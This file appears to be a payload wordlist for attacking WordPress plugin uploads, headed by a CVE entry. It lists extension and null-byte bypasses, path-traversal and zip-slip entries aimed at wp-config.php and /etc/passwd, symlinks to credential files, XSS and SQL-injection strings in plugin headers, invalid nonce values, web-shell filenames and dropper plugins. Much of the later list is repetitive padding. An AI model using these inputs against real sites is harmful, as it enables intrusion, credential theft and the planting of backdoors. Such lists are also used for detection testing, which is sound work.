# CVE-2026-28516: WordPress Plugin Upload Arbitrary File Upload
# Severity: Critical (CVSS 9.9)
# Affected Versions: WordPress 6.4.0 - 6.4.3
# Description: Arbitrary file upload vulnerability in WordPress plugin upload 
# mechanism allowing remote code execution through malicious plugin packages
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28516

# Basic Plugin Upload Bypass
# POST to /wp-admin/update.php?action=upload-plugin
# POST to /wp-admin/plugin-install.php?tab=upload

# Malicious Plugin Package Names (for testing detection)
malicious-plugin.zip
backdoor-plugin.zip
shell-plugin.zip
webshell.zip
evil-plugin.zip

# Double Extension Bypass
plugin.php.zip
plugin.zip.php
backdoor.tar.gz.php
shell.phar.zip

# Null Byte Injection
plugin.zip%00.php
backdoor.zip%00.txt
shell.zip\x00.jpg
malicious.zip%00.png

# MIME Type Confusion
# Content-Type: application/zip (but contains PHP)
# Content-Type: application/x-zip-compressed
# Content-Type: multipart/form-data
# Content-Type: application/octet-stream

# Path Traversal in Plugin Upload
../../wp-content/plugins/malicious/shell.php
../../../wp-content/themes/shell.php
../../../../wp-content/uploads/shell.php
../../wp-includes/shell.php

# Zip Slip Vulnerability Payloads
# Files inside ZIP with paths:
../../../wp-content/plugins/akismet/shell.php
../../wp-content/themes/twentytwentyfour/shell.php
../../../../wp-config.php
../../../.htaccess

# Symlink Attack in ZIP
# Create symlink in ZIP pointing to:
../../wp-config.php
../../../etc/passwd
../../wp-content/debug.log

# Plugin Metadata Manipulation
# In plugin header:
# Plugin Name: Legitimate Plugin<script>alert(1)</script>
# Plugin URI: javascript:alert(1)
# Author: <img src=x onerror=alert(1)>
# Version: 1.0' OR '1'='1

# Malicious Plugin Structure
malicious-plugin/
malicious-plugin/malicious-plugin.php
malicious-plugin/includes/shell.php
malicious-plugin/admin/backdoor.php
malicious-plugin/assets/webshell.php

# PHP Web Shell Filenames (for detection testing)
shell.php
backdoor.php
c99.php
r57.php
webshell.php
cmd.php
eval.php
assert.php
system.php
passthru.php

# Obfuscated PHP Extensions
plugin.php5
plugin.php7
plugin.phtml
plugin.phar
plugin.phps
plugin.php3
plugin.php4
plugin.inc
plugin.module

# Case Variation Bypass
SHELL.PHP
Shell.Php
BACKDOOR.php
WebShell.PHP

# Alternative Archive Formats
malicious.tar
malicious.tar.gz
malicious.tar.bz2
malicious.rar
malicious.7z
malicious.phar

# Polyglot Files (ZIP + PHP)
polyglot.zip
# File that is both valid ZIP and PHP
# Magic bytes: PK\x03\x04 (ZIP) + <?php (PHP)

# Directory Traversal in ZIP Entries
plugin-name/../../../shell.php
plugin-name/../../wp-content/shell.php
plugin-name/../wp-includes/backdoor.php

# Large File Upload (DoS)
# Files larger than upload_max_filesize
# Files with excessive number of entries
# Zip bombs (small compressed, huge uncompressed)

# Special Characters in Filenames
plugin-name/shell$.php
plugin-name/back`door.php
plugin-name/web;shell.php
plugin-name/cmd|exec.php
plugin-name/shell&.php

# Unicode and Encoding Bypass
plugin-name/shell\u0000.php
plugin-name/backdoor\x00.php
plugin-name/shell%00.php
plugin-name/webshell\n.php

# Hidden Files
plugin-name/.shell.php
plugin-name/.htaccess
plugin-name/.user.ini
plugin-name/.config.php

# Executable Permissions Bypass
plugin-name/shell.php.txt
plugin-name/backdoor.php.bak
plugin-name/webshell.php.old
plugin-name/cmd.php.disabled

# Plugin Activation Hooks Exploitation
# In main plugin file:
# register_activation_hook(__FILE__, 'malicious_function');
# add_action('init', 'backdoor_function');
# add_action('admin_init', 'shell_function');

# Auto-load Exploitation
plugin-name/vendor/autoload.php
plugin-name/composer.json
plugin-name/autoload.php

# Template File Upload
plugin-name/templates/shell.php
plugin-name/views/backdoor.php
plugin-name/pages/webshell.php

# Asset File Bypass
plugin-name/assets/js/shell.php
plugin-name/assets/css/backdoor.php
plugin-name/assets/images/shell.php.jpg

# Language File Bypass
plugin-name/languages/shell.php
plugin-name/lang/backdoor.php
plugin-name/i18n/webshell.php

# Database Migration Files
plugin-name/migrations/shell.php
plugin-name/db/backdoor.php
plugin-name/sql/webshell.php

# Configuration File Upload
plugin-name/config/shell.php
plugin-name/settings/backdoor.php
plugin-name/conf/webshell.php

# Library File Upload
plugin-name/lib/shell.php
plugin-name/libraries/backdoor.php
plugin-name/vendor/webshell.php

# Module File Upload
plugin-name/modules/shell.php
plugin-name/components/backdoor.php
plugin-name/widgets/webshell.php

# API Endpoint Files
plugin-name/api/shell.php
plugin-name/rest/backdoor.php
plugin-name/endpoints/webshell.php

# Admin Panel Files
plugin-name/admin/shell.php
plugin-name/backend/backdoor.php
plugin-name/dashboard/webshell.php

# AJAX Handler Files
plugin-name/ajax/shell.php
plugin-name/handlers/backdoor.php
plugin-name/actions/webshell.php

# Cron Job Files
plugin-name/cron/shell.php
plugin-name/scheduled/backdoor.php
plugin-name/tasks/webshell.php

# Cache Files
plugin-name/cache/shell.php
plugin-name/tmp/backdoor.php
plugin-name/temp/webshell.php

# Log Files with PHP
plugin-name/logs/shell.php
plugin-name/log/backdoor.php.log
plugin-name/debug/webshell.php

# Backup Files
plugin-name/backup/shell.php
plugin-name/backups/backdoor.php.bak
plugin-name/old/webshell.php.old

# Test Files
plugin-name/tests/shell.php
plugin-name/test/backdoor.php
plugin-name/testing/webshell.php

# Documentation Files with PHP
plugin-name/docs/shell.php
plugin-name/documentation/backdoor.php
plugin-name/readme/webshell.php

# Example Files
plugin-name/examples/shell.php
plugin-name/samples/backdoor.php
plugin-name/demo/webshell.php

# Build Files
plugin-name/build/shell.php
plugin-name/dist/backdoor.php
plugin-name/release/webshell.php

# Source Files
plugin-name/src/shell.php
plugin-name/source/backdoor.php
plugin-name/app/webshell.php

# Public Files
plugin-name/public/shell.php
plugin-name/public_html/backdoor.php
plugin-name/www/webshell.php

# Private Files
plugin-name/private/shell.php
plugin-name/protected/backdoor.php
plugin-name/secure/webshell.php

# Upload Directory Bypass
plugin-name/uploads/shell.php
plugin-name/files/backdoor.php
plugin-name/media/webshell.php

# Plugin Update Mechanism Bypass
# POST to /wp-admin/update.php?action=upload-plugin
# With manipulated plugin slug
plugin-slug=../../../wp-content/plugins/malicious
plugin-slug=../../themes/malicious
plugin-slug=../../../../uploads/malicious

# Nonce Bypass Attempts
_wpnonce=
_wpnonce=null
_wpnonce=0
_wpnonce=invalid
_wp_http_referer=/wp-admin/

# Plugin Overwrite Attack
# Upload plugin with same slug as existing plugin
akismet/shell.php
jetpack/backdoor.php
wordfence/webshell.php
yoast-seo/cmd.php

# Theme Upload via Plugin Mechanism
theme-as-plugin/style.css
theme-as-plugin/functions.php
theme-as-plugin/shell.php

# MU-Plugin Upload
mu-plugins/shell.php
mu-plugins/backdoor.php
mu-plugins/must-use-shell.php

# Dropper Plugin Technique
# Small plugin that downloads and executes larger payload
dropper.php
downloader.php
installer.php
updater.php

# Fileless Attack Vectors
# Plugin that stores code in database
# Plugin that uses eval() with database content
# Plugin that creates files after activation

# Plugin Dependency Exploitation
plugin-name/composer.lock
plugin-name/package.json
plugin-name/requirements.txt

# Environment File Upload
plugin-name/.env
plugin-name/.env.local
plugin-name/.env.production
plugin-name/config.ini

# Git Repository Files
plugin-name/.git/config
plugin-name/.gitignore
plugin-name/.git/hooks/post-receive

# SVN Repository Files
plugin-name/.svn/entries
plugin-name/.svn/wc.db

# IDE Configuration Files
plugin-name/.idea/workspace.xml
plugin-name/.vscode/settings.json
plugin-name/.project

# Package Manager Files
plugin-name/package-lock.json
plugin-name/yarn.lock
plugin-name/composer.lock

# Certificate Files
plugin-name/cert.pem
plugin-name/private.key
plugin-name/ssl.crt

# Database Files
plugin-name/database.sqlite
plugin-name/db.sql
plugin-name/backup.sql

# Serialized Data Files
plugin-name/data.ser
plugin-name/cache.dat
plugin-name/session.tmp
